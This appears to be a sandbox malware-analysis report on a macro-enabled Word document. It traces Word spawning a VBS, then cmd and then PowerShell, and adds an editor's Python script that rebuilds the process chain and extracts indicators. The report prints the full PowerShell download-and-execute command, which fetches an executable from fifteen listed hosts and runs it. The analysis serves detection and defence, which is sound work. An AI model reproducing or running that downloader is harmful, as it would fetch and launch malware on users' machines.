Analysis
max time kernel: 104s
max time network: 158s
platform: windows10-2004_x64
resource: win10v2004-20220414-en
submitted: 21-05-2022 03:39
Static task: static1
Behavioral task: behavioral1
  Sample: DieKlage-01092020-1994462004.docm
  Resource: win7-20220414-en
Behavioral task: behavioral2
  Sample: DieKlage-01092020-1994462004.docm
  Resource: win10v2004-20220414-en
General
Target: DieKlage-01092020-1994462004.docm
Size: 90KB
MD5: 09c2efc28d71216d95c49b33f24af6e3
SHA1: b8b3a9a39486c91222494004ef2498e977ad7524
SHA256: 94027e02da7382882c8046e165ba9bdf7b3fc801ecf35ab3f004b1a3fdcc743c
SHA512: be8158bcb2a6adccffd5d5486b0d4c51463df654d017e0ca58466a9d46c9c23a9811200779333d803933c402c8f660200db1e7c5c89796c83e1c4f3ed9ab67a3
Malware Config
Extracted (15 download URLs, all taken from the PowerShell command line below):
http://rodrigodecamargo.com.br/vhtderi/555555555.png
http://www.lelamantin.fr/uboljzeqfb/555555555.png
http://somethingspecialrd.com/emdnfin/555555555.png
http://www.intiming.it/zopnivucop/555555555.png
http://funminews.com/tdtmxmcjtkqo/555555555.png
http://lesehanpelangi.com/vswrdyzgo/555555555.png
http://anamtaexports.in/gbfrctzj/555555555.png
http://ebooks.libraryrule.com/ttfzyugewvft/555555555.png
http://the-lobby.org/xqjzx/555555555.png
http://www.biocosmeticashop.com/tftkbe/555555555.png
http://birlafincorp.com/xoygkcfaea/555555555.png
http://shainasaw.com/bvjlok/555555555.png
http://www.hygienicwallcladding.com/ucbucwmtfkan/555555555.png
http://marudhralive.com/ggyofqrt/555555555.png
http://dienmayhoatan.com/fmyctrjeqrxw/555555555.png
Signatures

Process spawned unexpected child process (1 IoC)
This typically indicates the parent process was compromised via an exploit or macro.
Processes:
  description: Parent C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE is not expected to spawn this process
  pid 1988 explorer.exe (child), pid_target 3092 WINWORD.EXE (parent)
Blocklisted process makes network request (9 IoCs)
Processes:
  pid 2656 powershell.exe: flows 43, 47, 52, 56, 57, 59, 62, 64, 71
Checks computer location settings (2 TTPs, 1 IoC)
Looks up the country code configured in the registry, most likely as a geofence check.
Processes:
  WScript.exe: key value queried \REGISTRY\USER\S-1-5-21-2632097139-1792035885-811742494-1000\Control Panel\International\Geo\Nation
Enumerates physical storage devices (1 TTPs)
Attempts to interact with connected storage/optical drive(s). The sandbox labels this as likely ransomware behaviour, but the report attaches no process or IoC to this signature, and nothing else in this run shows file encryption.
Checks processor information in registry (2 TTPs, 3 IoCs)
Processor information is often read in order to detect sandboxing environments. Note that all three reads here are attributed to WINWORD.EXE itself rather than to the dropped script, so on their own they are weak evidence of evasion by the macro.
Processes:
  WINWORD.EXE: key opened \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0
  WINWORD.EXE: key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz
  WINWORD.EXE: key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString
Enumerates system info in registry (2 TTPs, 3 IoCs)
Processes:
  WINWORD.EXE: key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS
  WINWORD.EXE: key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemFamily
  WINWORD.EXE: key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU
Modifies registry class (1 IoC)
Processes:
  explorer.exe: key created \REGISTRY\USER\S-1-5-21-2632097139-1792035885-811742494-1000_Classes\Local Settings
Suspicious behavior: AddClipboardFormatListener (2 IoCs)
Processes:
  pid 3092 WINWORD.EXE (x2)
Suspicious behavior: EnumeratesProcesses (2 IoCs)
Processes:
  pid 2656 powershell.exe (x2)
Suspicious use of AdjustPrivilegeToken (1 IoC)
Processes:
  pid 2656 powershell.exe: Token: SeDebugPrivilege
Suspicious use of SetWindowsHookEx (4 IoCs)
Processes:
  pid 3092 WINWORD.EXE (x4)
Suspicious use of WriteProcessMemory (8 IoCs)
Processes (each parent/child pair is recorded twice in the report):
  PID 3092 WINWORD.EXE wrote to memory of 1988 explorer.exe (x2)
  PID 544 explorer.exe wrote to memory of 4796 WScript.exe (x2)
  PID 4796 WScript.exe wrote to memory of 1300 cmd.exe (x2)
  PID 1300 cmd.exe wrote to memory of 2656 powershell.exe (x2)
Processes
(pids taken from the signature records above; indentation shows the parent/child depth the report marks with ⤵)

C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE (pid 3092)
  command line: "C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE" /n "C:\Users\Admin\AppData\Local\Temp\DieKlage-01092020-1994462004.docm" /o ""
  - Checks processor information in registry
  - Enumerates system info in registry
  - Suspicious behavior: AddClipboardFormatListener
  - Suspicious use of SetWindowsHookEx
  - Suspicious use of WriteProcessMemory

  C:\Windows\explorer.exe (pid 1988)
    command line: explorer.exe C:\ProgramData\jKLMJKGtftftyJHGFTYDA.vbs
    - Process spawned unexpected child process

C:\Windows\explorer.exe (pid 544, COM-activated)
  command line: C:\Windows\explorer.exe /factory,{75dff2b7-6936-4c06-a8bb-676a7b00b24b} -Embedding
  - Modifies registry class
  - Suspicious use of WriteProcessMemory

  C:\Windows\System32\WScript.exe (pid 4796)
    command line: "C:\Windows\System32\WScript.exe" "C:\ProgramData\jKLMJKGtftftyJHGFTYDA.vbs"
    - Checks computer location settings
    - Suspicious use of WriteProcessMemory

    C:\Windows\system32\cmd.exe (pid 1300)
      command line: C:\Windows\system32\cmd.exe /c ""C:\ApplesHelper\HGFTYUGYtyftTDFTYFYF.cmd" "
      - Suspicious use of WriteProcessMemory

      C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe (pid 2656)
        command line: POWerShell Foreach($url in @('http://rodrigodecamargo.com.br/vhtderi/555555555.png','http://www.lelamantin.fr/uboljzeqfb/555555555.png','http://somethingspecialrd.com/emdnfin/555555555.png','http://www.intiming.it/zopnivucop/555555555.png','http://funminews.com/tdtmxmcjtkqo/555555555.png','http://lesehanpelangi.com/vswrdyzgo/555555555.png','http://anamtaexports.in/gbfrctzj/555555555.png','http://ebooks.libraryrule.com/ttfzyugewvft/555555555.png','http://the-lobby.org/xqjzx/555555555.png','http://www.biocosmeticashop.com/tftkbe/555555555.png','http://birlafincorp.com/xoygkcfaea/555555555.png','http://shainasaw.com/bvjlok/555555555.png','http://www.hygienicwallcladding.com/ucbucwmtfkan/555555555.png','http://marudhralive.com/ggyofqrt/555555555.png','http://dienmayhoatan.com/fmyctrjeqrxw/555555555.png')) { try{$path = 'C:\ApplesHelper\KLHutufguyguyfgxdfg.exe'; (New-Object Net.WebClient).DownloadFile($url.ToString(), $path);saps $path; break;}catch{write-host $_.Exception.Message}}
        - Blocklisted process makes network request
        - Suspicious behavior: EnumeratesProcesses
        - Suspicious use of AdjustPrivilegeToken
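The chain above is the classic macro-to-PowerShell downloader pattern: Word hands a dropped .vbs to explorer.exe, the COM-activated explorer.exe instance (pid 544) starts WScript.exe, which runs a .cmd that launches the PowerShell download loop. As an added example that is not part of the sandbox report, the Python below rebuilds that chain from the report's own WriteProcessMemory records and pulls the URL list and drop path out of the PowerShell command line. The two input strings are copied from this report (the URL list shortened to three of its fifteen entries); the "Office host spawning a script/shell/proxy host" rule and all function names are the editor's own heuristic, not the sandbox's signature logic.

```python
"""Rebuild the process chain and pull IOCs out of a sandbox report.

Added example, not part of the sandbox report. The two input strings are
copied from this report (the URL list is shortened to three of its fifteen
entries); the Office-parent rule and all function names are the editor's own.
"""
import re

# Constructed from the report's "Suspicious use of WriteProcessMemory" records.
WPM_RECORDS = """\
PID 3092 wrote to memory of 1988 3092 WINWORD.EXE explorer.exe
PID 3092 wrote to memory of 1988 3092 WINWORD.EXE explorer.exe
PID 544 wrote to memory of 4796 544 explorer.exe WScript.exe
PID 544 wrote to memory of 4796 544 explorer.exe WScript.exe
PID 4796 wrote to memory of 1300 4796 WScript.exe cmd.exe
PID 4796 wrote to memory of 1300 4796 WScript.exe cmd.exe
PID 1300 wrote to memory of 2656 1300 cmd.exe powershell.exe
PID 1300 wrote to memory of 2656 1300 cmd.exe powershell.exe
"""

# Constructed from the report's PowerShell command line (URL list shortened).
PS_CMDLINE = (
    r"POWerShell Foreach($url in @('http://rodrigodecamargo.com.br/vhtderi/555555555.png',"
    r"'http://www.lelamantin.fr/uboljzeqfb/555555555.png',"
    r"'http://somethingspecialrd.com/emdnfin/555555555.png')) "
    r"{ try{$path = 'C:\ApplesHelper\KLHutufguyguyfgxdfg.exe'; "
    r"(New-Object Net.WebClient).DownloadFile($url.ToString(), $path);saps $path; break;}"
    r"catch{write-host $_.Exception.Message}}"
)

WPM_RE = re.compile(r"PID (\d+) wrote to memory of (\d+) \d+ (\S+) (\S+)")
URL_RE = re.compile(r"'(https?://[^']+)'")
PATH_RE = re.compile(r"\$path\s*=\s*'([^']+)'")

# Editor's heuristic: an Office host should never be the parent of these.
OFFICE_HOSTS = {"winword.exe", "excel.exe", "powerpnt.exe"}
PROXY_OR_SCRIPT_HOSTS = {"explorer.exe", "wscript.exe", "cscript.exe", "mshta.exe", "cmd.exe", "powershell.exe"}


def parse_edges(text):
    """Map (parent_pid, child_pid) -> (parent_image, child_image); repeated records collapse."""
    edges = {}
    for m in WPM_RE.finditer(text):
        ppid, cpid, pimg, cimg = m.groups()
        edges[(int(ppid), int(cpid))] = (pimg.lower(), cimg.lower())
    return edges


def suspicious_spawns(edges):
    """Office application writing into a script host, shell or explorer.exe it launched."""
    return sorted(
        (ppid, cpid, pimg, cimg)
        for (ppid, cpid), (pimg, cimg) in edges.items()
        if pimg in OFFICE_HOSTS and cimg in PROXY_OR_SCRIPT_HOSTS
    )


def lineage(edges, pid):
    """Walk parent links from pid back to the first process with no recorded parent, root first."""
    parent_of = {c: (p, pimg) for (p, c), (pimg, _) in edges.items()}
    image_of = {c: cimg for (_, c), (_, cimg) in edges.items()}
    chain = [(pid, image_of.get(pid, "?"))]
    while pid in parent_of:
        pid, pimg = parent_of[pid]
        chain.append((pid, pimg))
    return chain[::-1]


def cradle_iocs(cmdline):
    """Pull the candidate download URLs and the on-disk drop path from the PowerShell loop."""
    path = PATH_RE.search(cmdline)
    return {
        "urls": URL_RE.findall(cmdline),
        "drop_path": path.group(1) if path else None,
        # The loop breaks after the first DownloadFile that does not throw.
        "stops_after_first_success": "break" in cmdline,
    }


if __name__ == "__main__":
    edges = parse_edges(WPM_RECORDS)
    for ppid, cpid, pimg, cimg in suspicious_spawns(edges):
        print(f"ALERT {pimg} ({ppid}) -> {cimg} ({cpid})")
    # The chain from PowerShell stops at explorer.exe 544 (the COM-activated instance),
    # not at WINWORD.EXE: a rule keyed only on WScript.exe's parent never sees Word here.
    print(" -> ".join(f"{img}({p})" for p, img in lineage(edges, 2656)))
    print(cradle_iocs(PS_CMDLINE))
```

Two things the output makes visible that the flat report does not. First, walking parents from pid 2656 ends at explorer.exe 544, the COM-activated instance, so a detection keyed on "WScript.exe whose parent is an Office app" never fires in this run; the edge to alert on is WINWORD.EXE 3092 writing into explorer.exe 1988, which is exactly the "unexpected child process" signature above. Second, the cradle breaks after the first DownloadFile that does not throw, so the nine network flows recorded for pid 2656 are consistent with several of the fifteen hosts being tried in turn; the drop path is not among the captured files, so no second stage was obtained in this run.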
Network
MITRE ATT&CK Matrix ATT&CK v6
Downloads
(The PowerShell drop path C:\ApplesHelper\KLHutufguyguyfgxdfg.exe does not appear among the captured files, so no second-stage payload was obtained in this run.)

C:\ApplesHelper\HGFTYUGYtyftTDFTYFYF.cmd
Filesize: 24KB
MD5: db94c28610cb83c3056f1ae4e3e80463
SHA1: 174cb2cc87ff32c50b752a94eda80121811014bd
SHA256: 72223739a61890dac3cef9147aaa16b447d977cdf6ee413535a2826931db2b2d
SHA512: f94ec877c58b4c5aa503e2fff42deb8925c17d7fddbf4d10e4856b2254dc81117d0f9a1ec21ed4444a3e90d2c28e86fd1e776448f3aa80cb8977ca7021cb85e9

C:\ProgramData\jKLMJKGtftftyJHGFTYDA.vbs
Filesize: 74KB
MD5: 5ba27fb265515da4386aa9c025826e3a
SHA1: 16a4dfd513bd36714e560a3fcca8c3b846e2da57
SHA256: f9655447610215ddd56d097ea5bdeaaa1f7a730d66945c0cc86d8de51c5bb15e
SHA512: 977e4954d5ec90f2306d34f95fc4898e1309f1272306c3e70616738ef49eb1f53b8689580d8ddffa677f02b68ba90ef4f0ad45456a4e27ac9367f284823819b3

Memory dumps (pid-sequence-range):
memory/1300-142-0x0000000000000000-mapping.dmp
memory/1988-138-0x0000000000000000-mapping.dmp
memory/2656-146-0x00007FFD358A0000-0x00007FFD36361000-memory.dmp (10.8MB)
memory/2656-145-0x00000222A4F40000-0x00000222A4F62000-memory.dmp (136KB)
memory/2656-144-0x0000000000000000-mapping.dmp
memory/3092-135-0x00007FFD1E400000-0x00007FFD1E410000-memory.dmp (64KB)
memory/3092-137-0x000001980EA10000-0x000001980EA14000-memory.dmp (16KB)
memory/3092-136-0x00007FFD1E400000-0x00007FFD1E410000-memory.dmp (64KB)
memory/3092-130-0x00007FFD20A90000-0x00007FFD20AA0000-memory.dmp (64KB)
memory/3092-134-0x00007FFD20A90000-0x00007FFD20AA0000-memory.dmp (64KB)
memory/3092-133-0x00007FFD20A90000-0x00007FFD20AA0000-memory.dmp (64KB)
memory/3092-131-0x00007FFD20A90000-0x00007FFD20AA0000-memory.dmp (64KB)
memory/3092-132-0x00007FFD20A90000-0x00007FFD20AA0000-memory.dmp (64KB)
memory/3092-147-0x00007FFD20A90000-0x00007FFD20AA0000-memory.dmp (64KB)
memory/3092-149-0x00007FFD20A90000-0x00007FFD20AA0000-memory.dmp (64KB)
memory/3092-148-0x00007FFD20A90000-0x00007FFD20AA0000-memory.dmp (64KB)
memory/3092-150-0x00007FFD20A90000-0x00007FFD20AA0000-memory.dmp (64KB)
memory/4796-141-0x0000000000000000-mapping.dmp